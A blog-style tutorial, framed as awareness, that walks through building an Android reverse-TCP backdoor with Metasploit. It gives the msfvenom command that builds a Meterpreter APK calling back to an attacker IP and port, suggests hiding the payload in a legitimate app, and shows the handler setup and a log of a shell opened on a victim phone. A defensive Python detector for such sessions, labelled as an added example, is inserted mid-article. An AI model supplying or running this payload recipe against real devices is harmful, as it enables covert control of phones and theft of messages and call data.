Simple Android backdoor through Reverse TCP using MSF
Android is the most user-friendly and scalable OS that hand-held devices have ever had. It is open source and gives its users the power to tweak a lot in their devices. Such power can lead to security risks and vulnerabilities. One such power is the ability to install applications that do not come from the Play Store or from trusted developers.
The motive of this article is to bring awareness of why untrusted applications should never be installed on an Android device (or on any device) and how easy it is to take data from a remote device. Although it is explained in detail below, the actual process of creating a backdoor and taking control takes only a few minutes.
In this article we will see how a reverse TCP backdoor works, using a very well-known framework in the security community called "Metasploit".
Disclaimer:
This article is purely for educational purposes only and is not to be used for any malicious practices. I don't take any liability for any damages caused by unethical practices.
TCP/IP:
IP, or Internet Protocol, is the set of rules used in the Internet environment to provide logical addressing of hosts. In other words, IP addressing is what defines or traces an Internet-connected device.
TCP, or Transmission Control Protocol, is part of the IP suite and is responsible for data packet delivery and control. That is why it is customary to say "TCP/IP" when talking about TCP.
Reverse TCP??
When an attacker wants to access a device, he needs to initiate a connection to it. The chance of connecting from the attacker's machine to the target is very low, because the listening ports on the device won't be open; in the case of a computer, a firewall blocks the connection.
So, with a little social engineering, if the attacker can get his payload onto the target device, then instead of the above procedure the target device initiates a connection to the attacker's machine. This is called a reverse TCP connection.
Pre-Requisites:
- Linux machine (not necessarily, but preferably Linux) - Attacker
- Metasploit framework
- PostgreSQL (DB for Metasploit)
- Android device to test - Victim
What is Metasploit??
Metasploit is a very well-known security framework that contains a huge database of exploits and other scripts, used for penetration testing and for finding vulnerabilities/information. It is a product of the company Rapid7 and the framework can be downloaded from https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
Metasploit has 7 module types, and the module used depends on the requirement. In this article we look only at the exploit and payload modules.
Exploits and Payloads:
Exploits are modules for already-known vulnerabilities across different environments such as Linux, Unix and Android; an exploit delivers a payload once the vulnerability is triggered. The image below shows the environments for which exploits are available in Metasploit.
Payloads are the code that runs remotely on the target. Currently there are 2000+ exploits and 500+ payloads available in Metasploit. The payload used in our testing is Meterpreter reverse TCP, and multi/handler is the module used to handle connections from payloads that run outside the Metasploit framework.
Exploit steps:
In this article the exploit is tested on a local network. To use it over the Internet, port forwarding is required. For a persistent backdoor, the attacker machine needs a static IP along with port forwarding, and a process trigger is required in the payload code. Please note that it is unethical to test on other people's devices, as it breaches their privacy; individuals should refrain from such activities.
1. Find the local IP address using commands like "ip a", "ipconfig" or "ifconfig", depending on the environment/tools available. In my case, the local IP is 192.168.29.149.
2. Create the payload using msfvenom (the command-line utility of Metasploit for creating payloads).
Syntax: msfvenom -p payload_type lhost=0.0.0.0 lport=port_number R > destination path and payload name
-p : payload flag
lhost : local attacker's host IP, taken from step 1
lport : local attacker's listening port
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.29.149 lport=1443 R > /home/grim/Desktop/payload.apk
3. The output APK has no UI and no functions for any user activity. The payload can also be hidden inside a legitimate APK. Once the payload APK file is created, install it on your test device.
4. Start the payload listener on the local attacker machine using the commands below. Please refer to the comments given against each command in the snippet for a better understanding.
GRIM@kali:~/Desktop$ msfconsole                                   <<triggers metasploit console>>
msf5 > use exploit/multi/handler                                 <<set the type of exploit>>
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp                       <<set the type of payload>>
msf5 exploit(multi/handler) > set LHOST 192.168.29.149           <<set local host IP>>
LHOST => 192.168.29.149
msf5 exploit(multi/handler) > set LPORT 1443                     <<set local port used in payload>>
LPORT => 1443
msf5 exploit(multi/handler) > exploit                            <<Starts the exploit listener>>
[*] Started reverse TCP handler on 192.168.29.149:1443           <<Exploit listener started>>
[*] Sending stage (73735 bytes) to 192.168.29.158
[*] Meterpreter session 1 opened (192.168.29.149:1443 -> 192.168.29.158:47056) at 2020-06-14 10:08:02 -0400
<<Once the victim's device installs the app and accepts permissions, meterpreter session is opened>>
meterpreter >
5. Once the Meterpreter session is open, the backdoor has succeeded and the reverse TCP connection is established. Now type "help" to get the list of commands that can be executed on the target device.
meterpreter > help
6. Now let's test some commands, such as checking for root and taking SMS and call dumps.
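Seen from the defender's side, the pattern described in the reverse TCP section and visible in the handler log above (victim connects out to an unusual port, immediately receives a ~73 KB stage, then holds the session open) is something connection logs can flag. The following is an added example, not code from the original article or from Metasploit; the Flow fields, thresholds and sample records are assumptions for illustration, to be replaced by your own flow exporter's output.

```python
"""Heuristic detector for reverse-TCP backdoor sessions in connection records.
Added example, not from the article; fields, thresholds and samples are assumptions."""
from dataclasses import dataclass
from typing import List, Tuple

# Ports on which a phone talking to the outside world is unremarkable (assumed list).
COMMON_PORTS = {53, 80, 443, 853, 5228, 8080, 8443}
STAGE_MIN_BYTES = 50_000    # the handler log above shows a 73,735-byte stage
LONG_SESSION_SECS = 300     # an interactive Meterpreter session stays open for minutes

@dataclass(frozen=True)
class Flow:
    src: str        # initiator: in a reverse-TCP backdoor this is the victim phone
    sport: int
    dst: str        # the peer it connected to: the attacker's listener
    dport: int
    bytes_in: int   # bytes the initiator received on this connection
    duration: int   # seconds the connection stayed established

def reasons_for(flow: Flow) -> List[str]:
    """Return why a flow looks like a reverse-TCP session, or [] if it looks benign."""
    unusual_port = flow.dport not in COMMON_PORTS
    staged = flow.bytes_in >= STAGE_MIN_BYTES        # stage download right after connect
    long_lived = flow.duration >= LONG_SESSION_SECS  # operator keeps the session open
    # An unusual port alone is weak evidence; require a behavioural sign as well.
    if not (unusual_port and (staged or long_lived)):
        return []
    reasons = [f"outbound connection to unusual port {flow.dport}"]
    if staged:
        reasons.append(f"received {flow.bytes_in} bytes on connect (staged payload)")
    if long_lived:
        reasons.append(f"session held open for {flow.duration}s (interactive control)")
    return reasons

def suspicious_flows(flows: List[Flow]) -> List[Tuple[Flow, List[str]]]:
    """Keep only the flows that trip the heuristic, paired with their reasons."""
    return [(f, r) for f in flows if (r := reasons_for(f))]

# Constructed sample records modelled on the session in the handler log above.
SAMPLE_FLOWS = [
    Flow("192.168.29.158", 47056, "192.168.29.149", 1443, 73735, 1800),  # the backdoor
    Flow("192.168.29.158", 50112, "203.0.113.10", 443, 250000, 12),      # ordinary HTTPS fetch
    Flow("192.168.29.158", 53311, "192.168.29.1", 53, 120, 1),           # DNS to the router
    Flow("192.168.29.158", 40001, "192.168.29.20", 9100, 300, 2),        # brief printer probe
]

if __name__ == "__main__":
    for flow, reasons in suspicious_flows(SAMPLE_FLOWS):
        print(f"{flow.src}:{flow.sport} -> {flow.dst}:{flow.dport}: " + "; ".join(reasons))
```

Only the first sample record is reported; the HTTPS download is large but on a common port, and the printer probe is on an odd port but neither stage-sized nor long-lived.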
Conclusion:
So it is much easier to take control of an Android device than you think. It takes under five minutes to prepare a backdoor and take control of a device using such scripts. So never install unknown apps or grant device access to anyone. This applies to computers too. As the saying goes, "Prevention is always better than cure".